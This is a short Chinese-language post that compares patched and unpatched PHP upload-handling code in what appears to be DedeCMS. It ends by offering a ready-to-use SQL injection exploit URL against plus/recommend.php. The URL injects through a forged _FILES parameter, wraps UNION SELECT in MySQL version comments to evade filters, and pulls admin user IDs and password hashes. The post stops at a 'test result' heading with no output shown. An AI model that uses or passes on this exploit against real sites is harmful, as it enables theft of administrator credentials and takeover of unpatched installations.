from:http://p2j.cn/?p=798
对比了下补丁文件//正在比较文件 3.php 和 4.PHP
//***** 修补后.php
}
//$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
$$_key = $_FILES[$_key]['tmp_name'] = $_FILES[$_key]['tmp_name'];
${$_key.'_name'} = $_FILES[$_key]['name'];
//***** 修补前.PHP
}
$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
//吧$_FILES[$_key]['tmp_name']里面的\\\\替换为\\
${$_key.'_name'} = $_FILES[$_key]['name'];
/*****以下属于意淫时间
?_FILES[aid][name]=0&_FILES[aid][type]=1&_FILES[aid][size]=1&_FILES[aid][tmp_name]=abc\'
补前 可以使 $aid 的值为 abc\\' 具体不清楚
*******意淫完毕********/
只是提供exp:http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
测试效果: